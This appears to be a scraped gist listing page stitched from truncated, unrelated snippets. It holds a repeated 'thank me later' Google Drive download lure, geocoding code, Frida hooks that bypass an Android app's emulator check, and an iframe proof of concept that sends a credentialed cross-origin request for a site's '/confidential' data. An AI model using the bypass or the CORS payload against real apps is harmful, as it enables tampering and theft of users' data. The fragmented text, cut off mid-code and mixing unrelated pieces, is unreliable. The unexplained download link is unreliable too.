If you're also searching for it then you can download from my Google drive here:
https://drive.google.com/file/d/1wVKSkTJHxC2JHlEmjLYeV4MmfG-eVLcy/view?usp=sharing
thank me later!
If you're also searching for it then you can download from my Google drive here:
https://drive.google.com/file/d/1wVKSkTJHxC2JHlEmjLYeV4MmfG-eVLcy/view?usp=sharing
thank me later!
/d+
#2
([\da-f]{2}:?){6}
#3
import googlemaps | |
from datetime import datetime | |
gmaps = googlemaps.Client(key='Add Your Key here') | |
# Geocoding an address | |
geocode_result = gmaps.geocode('1600 Amphitheatre Parkway, Mountain View, CA') | |
# Look up an address with reverse geocoding | |
reverse_geocode_result = gmaps.reverse_geocode((40.714224, -73.961452)) |
from mapbox import Geocoder | |
def banner(): | |
return "\n[*] " | |
def mapbox(): | |
API_TOKEN = raw_input("Enter the Mapbox API key here and press enter:\n") | |
token_type = API_TOKEN[:2] |
#! /usr/bin/python | |
# Usage `python list-url.py` | |
import frida,sys | |
jspayload= """ | |
setImmediate(function() { |
setImmediate(function() { | |
Java.perform(function() { | |
//Saving retval | |
retval = Java.use("java.lang.Boolean").$new("False"); | |
chalJNI = Java.use("com.example.reverzeme.ChallengeJNI"); | |
chalJNI.checkIfDeviceIsEmulator.implementation = function(v) { |
"use strict"; | |
/* Check if a Java/Dalvik/ART VM is available */ | |
if (Java.available) { | |
//FIX - Need to be inside perform | |
Java.perform(function() { | |
/* enumerate loaded classes */ |
<html> | |
<body> | |
<iframe src='data:text/html,<script> | |
var xhr = new XMLHttpRequest(); | |
xhr.open("GET", "https://vuln-app.com/confidential", true); | |
xhr.withCredentials = true; | |
xhr.onload = function () { | |
if (xhr.readyState === xhr.DONE) { | |
console.log(xhr.response); | |
} |
I hereby claim:
To claim this, I am signing this object: